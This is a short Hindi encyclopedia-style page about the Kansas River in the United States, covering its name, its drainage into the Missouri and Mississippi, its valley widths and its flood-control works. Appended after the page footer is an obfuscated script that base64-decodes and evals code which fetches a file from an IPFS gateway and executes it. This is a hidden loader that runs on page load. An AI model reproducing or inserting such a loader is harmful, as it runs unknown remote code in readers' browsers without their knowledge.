कैन्सास नदी

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

कैन्सास नदी संयुक्त राज्य अमेरिका की नदी है। यह नदी कैन्सास राज्य से होकर बहती है। नदी का नाम और उपनाम कभी इस क्षेत्र में रहने वाले 'काञ्ज़ा' (कौ) लोगों के नाम पर पड़ा है। फिर बाद में इसी नदी के नाम पर कैन्सास राज्य का नाम पड़ा।

  • कैन्सास नदी को 'कौ' के नाम से भी जाना जाता है। यह नदी मिसोरी नदी की जल निकासी का सबसे दक्षिण-पश्चिमी भाग है, जो स्वयं भी मिसिसिपी नदी की जल निकासी का सबसे उत्तर-पश्चिमी भाग है।
  • नदी घाटी की औसत चौड़ाई 4.2 कि.मी. तक है और सर्वाधिक चौड़ाई वैमेगो और रौसविले के बीच है, जहाँ पर ये 6.4 कि.मी. चौड़ी है।
  • इस नदी की चौड़ाई यूडोरा से नीचे के स्थानों पर कम होकर मात्र 1.6 कि.मी. तक रह जाती है।
  • कैन्सास नदी का अधिकतर भाग बाढ़ नियन्त्रण के लिए बाँधीकृत है, लेकिन नदी सामान्यतः मुक्त रूप से ही प्रवाहित होती है।
  • इसके मार्ग पर बहुत कम अवरोधक हैं, जिसमें मोड़ बाँध और एक निम्न प्रभाव वाला पनबिजली बाँध सम्मिलित है।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>